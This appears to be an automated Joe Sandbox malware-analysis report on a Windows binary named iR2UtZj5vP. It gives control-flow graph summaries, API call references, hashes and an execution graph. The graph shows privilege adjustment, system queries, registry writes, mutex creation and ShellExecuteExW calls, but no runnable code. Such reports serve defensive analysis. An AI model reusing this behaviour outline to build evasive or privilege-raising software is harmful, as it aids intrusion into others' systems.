                                                                        control_flow_graph 1221 404ec0-404ef6 CopyRect call 403c20 1224 404f06-404f28 CopyRect call 403c20 1221->1224 1225 404ef8-404f03 1221->1225 1228 404f38-404f5a CopyRect call 403c20 1224->1228 1229 404f2a-404f35 1224->1229 1232 404f6a-404f8c CopyRect call 403c20 1228->1232 1233 404f5c-404f67 1228->1233 1236 404f9c-404fbe CopyRect call 403c20 1232->1236 1237 404f8e-404f99 1232->1237 1240 404fc0-404fcb 1236->1240 1241 404fce-404ff0 CopyRect call 403c20 1236->1241 1244 405000-405022 CopyRect call 403c20 1241->1244 1245 404ff2-404ffd 1241->1245 1248 405032-405054 CopyRect call 403c20 1244->1248 1249 405024-40502f 1244->1249 1252 405064-405086 CopyRect call 403c20 1248->1252 1253 405056-405061 1248->1253 1256 405096-4050b8 CopyRect call 403c20 1252->1256 1257 405088-405093 1252->1257 1260 4050c8-4050ea CopyRect call 403c20 1256->1260 1261 4050ba-4050c5 1256->1261 1264 4050fa-40511c CopyRect call 403c20 1260->1264 1265 4050ec-4050f7 1260->1265 1268 40512c-40514e CopyRect call 403c20 1264->1268 1269 40511e-405129 1264->1269 1272 405150-40515b 1268->1272 1273 40515e-405180 CopyRect call 403c20 1268->1273 1276 405190-4051b2 CopyRect call 403c20 1273->1276 1277 405182-40518d 1273->1277 1280 4051c2-4051e4 CopyRect call 403c20 1276->1280 1281 4051b4-4051bf 1276->1281 1284 4051f4-405216 CopyRect call 403c20 1280->1284 1285 4051e6-4051f1 1280->1285 1288 405226-405248 CopyRect call 403c20 1284->1288 1289 405218-405223 1284->1289 1292 405258-40527a CopyRect call 403c20 1288->1292 1293 40524a-405255 1288->1293 1296 40528a-4052b7 CopyRect call 403c20 1292->1296 1297 40527c-405287 1292->1297
                                                                        APIs
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404ED6
                                                                          • Part of subcall function 00403C20: _ftol.MSVCRT ref: 00403D58
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404F10
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.1340936247.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000001.00000002.1340792987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000001.00000002.1340936247.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000001.00000002.1340936247.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000001.00000002.1341077994.0000000000443000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000001.00000002.1341195697.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_400000_iR2UtZj5vP.jbxd
                                                                        Similarity
                                                                        • API ID: CopyRect$_ftol
                                                                        • String ID: BottoFlowerPetal2$BottomFlowerPetal1$BottomFlowerPetal3$LeftFlowerPetal1$LeftFlowerPetal2$LeftFlowerPetal3$Polygon14$Polygon15$Polygon16$Polygon17$Polygon2$Polygon3$Polygon31$Polygon32$RightFlowerPetal1$RightFlowerPetal2$RightFlowerPetal3$TopFlowerPetal$TopFlowerPetal1$TopFlowerPetal2
                                                                        • API String ID: 1144628616-677921438
                                                                        • Opcode ID: 1dab24f9fa47664b03d749d1ed14e596c18f688459fec3e730af87b273ffaf24
                                                                        • Instruction ID: 8a5b5832819b54604f0eb40b5f2cfffe4246f56c5ea39582f8810119041c68d6
                                                                        • Opcode Fuzzy Hash: 1dab24f9fa47664b03d749d1ed14e596c18f688459fec3e730af87b273ffaf24
                                                                        • Instruction Fuzzy Hash: EDA1C3BB6443103AE210B259AC42EAB676CDBE8724F408C3BF958D11C1F57DDA18C7B6
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1300 40b10f-40b184 __set_app_type __p__fmode __p__commode call 40b295 1303 40b192-40b1e9 call 40b280 _initterm __getmainargs _initterm 1300->1303 1304 40b186-40b191 __setusermatherr 1300->1304 1307 40b225-40b228 1303->1307 1308 40b1eb-40b1f3 1303->1308 1304->1303 1309 40b202-40b206 1307->1309 1310 40b22a-40b22e 1307->1310 1311 40b1f5-40b1f7 1308->1311 1312 40b1f9-40b1fc 1308->1312 1314 40b208-40b20a 1309->1314 1315 40b20c-40b21d GetStartupInfoA 1309->1315 1310->1307 1311->1308 1311->1312 1312->1309 1313 40b1fe-40b1ff 1312->1313 1313->1309 1314->1313 1314->1315 1316 40b230-40b232 1315->1316 1317 40b21f-40b223 1315->1317 1318 40b233-40b23e GetModuleHandleA call 40b2a2 1316->1318 1317->1318 1320 40b243-40b260 exit _XcptFilter 1318->1320
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.1340936247.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000001.00000002.1340792987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000001.00000002.1340936247.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000001.00000002.1340936247.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000001.00000002.1341077994.0000000000443000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000001.00000002.1341195697.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_400000_iR2UtZj5vP.jbxd
                                                                        Similarity
                                                                        • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                                                                        • String ID:
                                                                        • API String ID: 801014965-0
                                                                        • Opcode ID: 4e1e83045593532e3e54d4086fe12bd443ea795f31f0b1fa31bee2aa57048aae
                                                                        • Instruction ID: 92e6429448b312161c6c86a2e6f2100586677b1d17cdbc89596afef87365b123
                                                                        • Opcode Fuzzy Hash: 4e1e83045593532e3e54d4086fe12bd443ea795f31f0b1fa31bee2aa57048aae
                                                                        • Instruction Fuzzy Hash: 68416FB5800344EFDB209FA5D889AAE7BB8EB09714F20067FE551A72E1D7784841CB9C
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1373 404360-4044a9 call 4048b0 call 40adf6 call 40adf0 call 40adea 1382 404552-40455e 1373->1382 1383 4044af-4044b1 1373->1383 1385 404560-404572 CreatePolygonRgn call 40ae02 1382->1385 1386 4045cb-4045d4 CreatePolygonRgn call 40ae02 1382->1386 1383->1382 1384 4044b7-4044bd 1383->1384 1384->1382 1388 4044c3-4044c7 1384->1388 1394 404574-404576 1385->1394 1395 404578 1385->1395 1391 4045d9-4045db 1386->1391 1392 4044cd-4044e3 1388->1392 1393 40454e 1388->1393 1396 4045e6-404667 call 40adcc * 4 1391->1396 1397 4045dd-4045e3 call 40add2 1391->1397 1398 4044e9-404548 _ftol * 2 1392->1398 1393->1382 1399 40457b-4045c9 CombineRgn CreatePolygonRgn call 40ae02 CombineRgn 1394->1399 1395->1399 1397->1396 1398->1398 1401 40454a-40454c 1398->1401 1399->1391 1401->1393
                                                                        APIs
                                                                        • _ftol.MSVCRT ref: 0040450A
                                                                        • _ftol.MSVCRT ref: 00404538
                                                                        • CreatePolygonRgn.GDI32(00000000,?,00000001), ref: 00404560
                                                                        • CombineRgn.GDI32(?,?,00000000,00000005), ref: 00404585
                                                                        • CreatePolygonRgn.GDI32(00000000,?,00000001), ref: 0040458F
                                                                        • CombineRgn.GDI32(?,?,?,00000002), ref: 004045C3
                                                                        • CreatePolygonRgn.GDI32(00000000,?,00000001), ref: 004045CB
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.1340936247.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000001.00000002.1340792987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000001.00000002.1340936247.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000001.00000002.1340936247.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000001.00000002.1341077994.0000000000443000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000001.00000002.1341195697.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_400000_iR2UtZj5vP.jbxd
                                                                        Similarity
                                                                        • API ID: CreatePolygon$Combine_ftol
                                                                        • String ID:
                                                                        • API String ID: 2242366081-0
                                                                        • Opcode ID: 76b59d60c353cbaa1d95a5d0ad8cfcc92339eaeaa5065b38da4cc76092f4088c
                                                                        • Instruction ID: 39bea9fad0b66382f5372ed494b3add627d4de448e91ddc4441a9f07906a4bc8
                                                                        • Opcode Fuzzy Hash: 76b59d60c353cbaa1d95a5d0ad8cfcc92339eaeaa5065b38da4cc76092f4088c
                                                                        • Instruction Fuzzy Hash: B09156B19083419FC310DF29C985A5BBBE4FFC4750F018A2EF999A7291DB34D814CB86
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1413 403e10-403f48 call 4048b0 * 2 call 40adf6 call 40adf0 call 40adea 1424 403fd1-403fdd 1413->1424 1425 403f4e-403f50 1413->1425 1427 40404a-404053 CreatePolygonRgn call 40ae02 1424->1427 1428 403fdf-403ff1 CreatePolygonRgn call 40ae02 1424->1428 1425->1424 1426 403f52-403f56 1425->1426 1426->1424 1430 403f58-403f6e 1426->1430 1432 404058-40405a 1427->1432 1438 403ff3-403ff5 1428->1438 1439 403ff7 1428->1439 1433 403f74-403fcb _ftol * 2 1430->1433 1435 404065-4040e6 call 40adcc * 4 1432->1435 1436 40405c-404062 call 40add2 1432->1436 1433->1433 1437 403fcd-403fcf 1433->1437 1436->1435 1437->1424 1442 403ffa-404048 CombineRgn CreatePolygonRgn call 40ae02 CombineRgn 1438->1442 1439->1442 1442->1432
                                                                        APIs
                                                                        • _ftol.MSVCRT ref: 00403F95
                                                                        • _ftol.MSVCRT ref: 00403FBF
                                                                        • CreatePolygonRgn.GDI32(00000000,?,00000001), ref: 00403FDF
                                                                        • CombineRgn.GDI32(?,?,00000000,00000005), ref: 00404004
                                                                        • CreatePolygonRgn.GDI32(00000000,?,00000001), ref: 0040400E
                                                                        • CombineRgn.GDI32(?,?,?,00000002), ref: 00404042
                                                                        • CreatePolygonRgn.GDI32(00000000,?,00000001), ref: 0040404A
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.1340936247.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000001.00000002.1340792987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000001.00000002.1340936247.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000001.00000002.1340936247.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000001.00000002.1341077994.0000000000443000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000001.00000002.1341195697.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_400000_iR2UtZj5vP.jbxd
                                                                        Similarity
                                                                        • API ID: CreatePolygon$Combine_ftol
                                                                        • String ID:
                                                                        • API String ID: 2242366081-0
                                                                        • Opcode ID: dbf15af777a9242a6ab4e2c7a6b65f1fdb691b85148fe195744af21802976117
                                                                        • Instruction ID: d78316a0bae83b4357ed0e5d5a94130920efe7575c7a00bd962797de7769c8fd
                                                                        • Opcode Fuzzy Hash: dbf15af777a9242a6ab4e2c7a6b65f1fdb691b85148fe195744af21802976117
                                                                        • Instruction Fuzzy Hash: 189179B1A083419FC310DF25C985A5BBBF4FF88714F118A2DF99AA7291DB34D914CB86
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        APIs
                                                                          • Part of subcall function 00401000: CopyRect.USER32(?,0040E020), ref: 0040100D
                                                                        • _ftol.MSVCRT ref: 00409CF7
                                                                        • _ftol.MSVCRT ref: 00409D0E
                                                                        • _ftol.MSVCRT ref: 00409D2B
                                                                        • GetWindowRect.USER32(?,?), ref: 00409D86
                                                                          • Part of subcall function 00402500: CopyRect.USER32(?,0040E020), ref: 00402516
                                                                          • Part of subcall function 00402500: CopyRect.USER32(?,0040E020), ref: 0040253E
                                                                          • Part of subcall function 00402500: CopyRect.USER32(?,0040E020), ref: 0040255E
                                                                          • Part of subcall function 00402500: CopyRect.USER32(?,0040E020), ref: 0040257E
                                                                          • Part of subcall function 00402500: CopyRect.USER32(?,0040E020), ref: 0040259E
                                                                          • Part of subcall function 00402500: CopyRect.USER32(?,0040E020), ref: 004025BE
                                                                          • Part of subcall function 00402500: CopyRect.USER32(?,0040E020), ref: 004025DE
                                                                          • Part of subcall function 00402500: CopyRect.USER32(?,0040E020), ref: 004025FE
                                                                          • Part of subcall function 00402500: CopyRect.USER32(?,0040E020), ref: 0040261E
                                                                        • SetWindowRgn.USER32(?,0040C340,00000001), ref: 00409DBF
                                                                        • SetCapture.USER32(?), ref: 00409DC9
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.1340936247.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000001.00000002.1340792987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000001.00000002.1340936247.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000001.00000002.1340936247.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000001.00000002.1341077994.0000000000443000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000001.00000002.1341195697.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_400000_iR2UtZj5vP.jbxd
                                                                        Similarity
                                                                        • API ID: Rect$Copy$_ftol$Window$Capture
                                                                        • String ID:
                                                                        • API String ID: 1685161017-0
                                                                        • Opcode ID: 4a7094b539b862f338539457f0d8793b4a741916dd4dc3ebb93e6d5d52ff0bfe
                                                                        • Instruction ID: 353ad75620bb99855249955aa37f7dffc4285601670c8d5eecd51fb0f0ccdc6c
                                                                        • Opcode Fuzzy Hash: 4a7094b539b862f338539457f0d8793b4a741916dd4dc3ebb93e6d5d52ff0bfe
                                                                        • Instruction Fuzzy Hash: 1F416DB12187068FC304DF7AC98595BBBE8FBC8704F044A3EB49993381DB74E9098B56
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1466 40a940-40a999 GetWindowRect 1467 40aa54-40aa7e ClientToScreen call 40b08a 1466->1467 1468 40a99f-40a9a0 1466->1468 1470 40aa83-40aabc call 40adcc 1467->1470 1468->1470 1471 40a9a6-40a9a8 1468->1471 1472 40a9b2-40a9e6 call 4052c0 _ftol 1471->1472 1473 40a9aa-40a9ac 1471->1473 1472->1470 1478 40a9ec-40a9f1 1472->1478 1473->1470 1473->1472 1478->1470 1479 40a9f7-40aa4b call 40afbe GetWindowRect call 40afb8 call 405300 SetWindowRgn 1478->1479 1486 40aa4d call 40a440 1479->1486 1487 40aa52 1486->1487 1487->1470
                                                                        APIs
                                                                        • GetWindowRect.USER32(?,?), ref: 0040A97F
                                                                        • _ftol.MSVCRT ref: 0040A9D4
                                                                        • GetWindowRect.USER32(?,?), ref: 0040AA11
                                                                        • SetWindowRgn.USER32(?,0040C340,00000001), ref: 0040AA45
                                                                        • ClientToScreen.USER32(?,?), ref: 0040AA5D
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.1340936247.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000001.00000002.1340792987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000001.00000002.1340936247.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000001.00000002.1340936247.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000001.00000002.1341077994.0000000000443000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000001.00000002.1341195697.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_400000_iR2UtZj5vP.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Rect$ClientScreen_ftol
                                                                        • String ID:
                                                                        • API String ID: 2665761307-0
                                                                        • Opcode ID: b998918826c77febf2a25c4be3886caa5153053d104f383c60fb6be50d5108d4
                                                                        • Instruction ID: a66530a9fee688cda4384b7b61b220c0551d436bf9aef3ce9762855fe69dfb7b
                                                                        • Opcode Fuzzy Hash: b998918826c77febf2a25c4be3886caa5153053d104f383c60fb6be50d5108d4
                                                                        • Instruction Fuzzy Hash: 58413C752047059FC714DF25C98492BB7E9FBC8B04F004A2EF98693790DB38E909CBA6
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • LPtoDP.GDI32(?,?,00000002), ref: 00409EDA
                                                                        • GetMapMode.GDI32(?,0040C6D4,00000000), ref: 00409F22
                                                                        • DPtoLP.GDI32(?,?,00000002), ref: 00409F3E
                                                                        • GetWindowRect.USER32(?,?), ref: 00409F87
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.1340936247.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000001.00000002.1340792987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000001.00000002.1340936247.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000001.00000002.1340936247.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000001.00000002.1341077994.0000000000443000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000001.00000002.1341195697.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_400000_iR2UtZj5vP.jbxd
                                                                        Similarity
                                                                        • API ID: ModeRectWindow
                                                                        • String ID:
                                                                        • API String ID: 3564110013-0
                                                                        • Opcode ID: 24ead7c7138b67f3a46476f4c84bfb2031621dddb6359352eea06206daee3e16
                                                                        • Instruction ID: 387955213cf341242af21f02e85b7fd3331607f5cb7a19bffeb898acdc1f93f5
                                                                        • Opcode Fuzzy Hash: 24ead7c7138b67f3a46476f4c84bfb2031621dddb6359352eea06206daee3e16
                                                                        • Instruction Fuzzy Hash: 997127711183409FC314DF64C88496FBBF8EBC9704F108A2EF6A693291DB79E905CB96
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.1340936247.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000001.00000002.1340792987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000001.00000002.1340936247.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000001.00000002.1340936247.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000001.00000002.1341077994.0000000000443000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000001.00000002.1341195697.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_400000_iR2UtZj5vP.jbxd
                                                                        Similarity
                                                                        • API ID: _ftol$CreatePolygonRegion
                                                                        • String ID:
                                                                        • API String ID: 4272746700-0
                                                                        • Opcode ID: 17b7e62d37637a2d73482e15072a4be556ec02c4b51384e8a89ed16f1ffde3de
                                                                        • Instruction ID: bbc22f1e7c48a6dab8c73f5009b7f3ca445a8864c2917b6fdd274eb9f33cd00a
                                                                        • Opcode Fuzzy Hash: 17b7e62d37637a2d73482e15072a4be556ec02c4b51384e8a89ed16f1ffde3de
                                                                        • Instruction Fuzzy Hash: FF5113B5A087029FC300DF25C58491ABBF4FF88750F118A6EF895A2391EB35D925CB86
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Execution Graph

                                                                        Execution Coverage:12.9%
                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                        Signature Coverage:9.5%
                                                                        Total number of Nodes:63
                                                                        Total number of Limit Nodes:3
                                                                        execution_graph 1673 b8a99a 1674 b8a9c6 FindCloseChangeNotification 1673->1674 1675 b8aa07 1673->1675 1676 b8a9d4 1674->1676 1675->1674 1677 b8ae5a 1678 b8ae92 CreateFileW 1677->1678 1680 b8aee1 1678->1680 1753 b8a67b 1754 b8a6ae LookupPrivilegeValueW 1753->1754 1756 b8a6fe 1754->1756 1681 b8a2fe 1682 b8a32a SetErrorMode 1681->1682 1684 b8a353 1681->1684 1683 b8a33f 1682->1683 1684->1682 1737 b8af30 1738 b8af72 GetFileType 1737->1738 1740 b8afd4 1738->1740 1721 b8ab92 1724 b8abc6 CreateMutexW 1721->1724 1723 b8ac41 1724->1723 1733 b8a2d2 1734 b8a2d6 SetErrorMode 1733->1734 1736 b8a33f 1734->1736 1725 b8a893 1727 b8a89d AdjustTokenPrivileges 1725->1727 1728 b8a91b 1727->1728 1745 b8aa15 1746 b8aa46 NtQuerySystemInformation 1745->1746 1748 b8aa90 1746->1748 1693 b8a8ca 1696 b8a8f9 AdjustTokenPrivileges 1693->1696 1695 b8a91b 1696->1695 1757 b8a960 1758 b8a99a FindCloseChangeNotification 1757->1758 1760 b8a9d4 1758->1760 1761 b8a361 1762 b8a392 RegQueryValueExW 1761->1762 1764 b8a41b 1762->1764 1701 b8b102 1704 b8b137 WriteFile 1701->1704 1703 b8b169 1704->1703 1729 b8b0e2 1731 b8b102 WriteFile 1729->1731 1732 b8b169 1731->1732 1765 b8a462 1767 b8a486 RegSetValueExW 1765->1767 1768 b8a507 1767->1768 1741 b8ae23 1742 b8ae5a CreateFileW 1741->1742 1744 b8aee1 1742->1744 1749 b8b304 1752 b8b326 ShellExecuteExW 1749->1752 1751 b8b368 1752->1751 1709 b8abc6 1710 b8abfe CreateMutexW 1709->1710 1712 b8ac41 1710->1712 1713 b8b326 1716 b8b34c ShellExecuteExW 1713->1716 1715 b8b368 1716->1715 1717 b8aa46 1718 b8aa7b NtQuerySystemInformation 1717->1718 1719 b8aaa6 1717->1719 1720 b8aa90 1718->1720 1719->1718

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 342 b8a893-b8a8f7 346 b8a8f9 342->346 347 b8a8fc-b8a90b 342->347 346->347 348 b8a90d-b8a92d AdjustTokenPrivileges 347->348 349 b8a94e-b8a953 347->349 352 b8a92f-b8a94b 348->352 353 b8a955-b8a95a 348->353 349->348 353->352
                                                                        APIs
                                                                        • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 00B8A913
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1424215161.0000000000B8A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B8A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_b8a000_iR2UtZj5vP.jbxd
                                                                        Similarity
                                                                        • API ID: AdjustPrivilegesToken
                                                                        • String ID:
                                                                        • API String ID: 2874748243-0
                                                                        • Opcode ID: 30679170a296a6995bdc00f8e94be450b1f1a2b6daf5451616dfe644d7d88a97
                                                                        • Instruction ID: eda96f4b280767fd5f9ee112ea800a931dbabbdbc04ce60080b108fe98cd5c00
                                                                        • Opcode Fuzzy Hash: 30679170a296a6995bdc00f8e94be450b1f1a2b6daf5451616dfe644d7d88a97
                                                                        • Instruction Fuzzy Hash: 0221D1765097809FEB228F25DC44B52BFF4EF06310F0884DBE9858B5A3D270A908CB62
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • NtQuerySystemInformation.NTDLL ref: 00B8AA81
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1424215161.0000000000B8A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B8A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_b8a000_iR2UtZj5vP.jbxd
                                                                        Similarity
                                                                        • API ID: InformationQuerySystem
                                                                        • String ID:
                                                                        • API String ID: 3562636166-0
                                                                        • Opcode ID: 3cbc8d3c81a9687299a09b0f199d5b894edcf1673cb8f6df8e3ccb2ba394c9b6
                                                                        • Instruction ID: 7a7052e4d7d8d4332f61b9056718814ecc670c1e721511bff307541bb14da586
                                                                        • Opcode Fuzzy Hash: 3cbc8d3c81a9687299a09b0f199d5b894edcf1673cb8f6df8e3ccb2ba394c9b6
                                                                        • Instruction Fuzzy Hash: 4A11D0724093C09FDB228F10DD44A52FFF4EF06324F0984CBE9854B6A3D275A908CB62
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 00B8A913
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1424215161.0000000000B8A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B8A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_b8a000_iR2UtZj5vP.jbxd
                                                                        Similarity
                                                                        • API ID: AdjustPrivilegesToken
                                                                        • String ID:
                                                                        • API String ID: 2874748243-0
                                                                        • Opcode ID: e9728d8d70feaca1a11deebf70b570b2528bd690c51e5a24d0e6e30aa4662e1c
                                                                        • Instruction ID: 533a6a42c2250d4dbc71b9eeabc85b83b1578232e4cb0d5a24a7026ae009c469
                                                                        • Opcode Fuzzy Hash: e9728d8d70feaca1a11deebf70b570b2528bd690c51e5a24d0e6e30aa4662e1c
                                                                        • Instruction Fuzzy Hash: 7011A0725042009FEB20DF55D988B52FBE8EF04320F0884AADD468B666D375E818DF62
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • NtQuerySystemInformation.NTDLL ref: 00B8AA81
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1424215161.0000000000B8A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B8A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_b8a000_iR2UtZj5vP.jbxd
                                                                        Similarity
                                                                        • API ID: InformationQuerySystem
                                                                        • String ID:
                                                                        • API String ID: 3562636166-0
                                                                        • Opcode ID: d172994b5d8226e1fca04191e0478936afbf94907ee95cb534deceaa5b65ec3e
                                                                        • Instruction ID: a5e1f1154d0c95831ddaf727f402a07a9c3305127fbb7f7b22eba23e3c957ecb
                                                                        • Opcode Fuzzy Hash: d172994b5d8226e1fca04191e0478936afbf94907ee95cb534deceaa5b65ec3e
                                                                        • Instruction Fuzzy Hash: 5F018F314002009FEB209F05DA88B61FBE4EF48320F08C49ADE860AB62D375A418DFA2
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1428220836.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_4d30000_iR2UtZj5vP.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a2a7da57d30367795454ee3658b6430147915b67aa39fe773db4b8aa7e5b2304
                                                                        • Instruction ID: 4570f7b416125a006f59ba1d003173a36f3675775dc3835013bce5ff311164ac
                                                                        • Opcode Fuzzy Hash: a2a7da57d30367795454ee3658b6430147915b67aa39fe773db4b8aa7e5b2304
                                                                        • Instruction Fuzzy Hash: 85722374E00269CFCB24DF68C984BADF7B2BB49309F1085A9D449AB755DB34AE81CF50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
